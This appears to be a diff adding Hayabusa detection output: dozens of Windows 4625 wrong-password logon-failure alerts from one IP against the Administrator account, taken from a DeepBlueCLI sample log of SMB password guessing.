+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHNG9oylnT46IObg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LUeAisNPQULjD2t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2sB5MlRw4Ox1OWdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WaklWtKd8QByH8M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nzvyy6CUk43SVxZW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xeolvnD92qP1dJPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDvRwPbu6yQH2pEf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxKdofXKKkCLn2n6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkO9p50Q9iFolbmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p01SZCA784xmPMe2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XKaI3FHBbBXvVsES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmUk6sW8QreDIZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0w9SSWaaTX7chM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 46vgsyX5Wxn2rupf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PV8628a8GNKoFyzM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mksBFEFzkC08dB4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U6QlHT6Bp63JDehd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRj4fxcRY0Esegl6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dj6zQjZwGEBo0zNt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imfY1T2VMoaqDSUd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvPP8UYn9fLpRYl4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFTGQ5tzNI5k58cK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8Zj3g1WiTLx8OlJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x2Lr6j8Qt4xEmZZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BeDRsguCovO47lKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KqrDyaFTewMPSzD9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nBVMAki1Ghpknf6p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXKhNUmBUQBTyeNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1g9TVwsweaBfZgE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kWymb6ucohaBB60b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjL0zwlZofVuWhGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxsdzkJdnaZs5eKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PR6EpKvbqMeoQlKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZ3LMTtsVNI1gRO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75bNeXwYSZPhJdJ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lH6TVXSqJb1qLd3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edDWye6c2UhKznR6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxKUl1lynGY1ectn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vI5yUgukPBVRorJI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmR29QcBKMGVQ8rB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7luV5GfiT0v0h7D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yA7pIDFgQbLIInqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 84g2gO0253Ut4O1O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DRkFX9WTAhBZ8jc8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuoQAi4k3XZPaf4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KjKMhCnbR0uFT0av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lfwqPB0AgTfIOt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mJuG26pQzdjUQael  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXwEziYTA3DkkFVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CHr6dirvkT8B9ZVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B5eSMLiF4BsfY3xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64ISDuFRhR6cFYVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcprXytyuBw380XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxfQWiSIhZYxwNjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FcL982boDelzeyzK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBAAjRdaR8U0tqt7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EmqUjcltAW6StHQJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 129Rp3HCmRVRXw3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jpIIQP2oWEF51EBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HREGh5ppEkLAuEob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVkpQvotEMfM8R0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm6uHEy5RJJBJ6FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPTyAkYjcIlko5lu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OjlRoo9Sot4Fx4Th  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XslY26kw2aBw19D8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1404fakprYeqGiNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2VfIjtBcXCRlOjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPztyX4J9NV8EldT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 07flrrzWgsVBYaN2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vgkqkC1VvznGxR6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hMn6yDMLgLChJTL6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uSTokOJ31Tj0bLXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
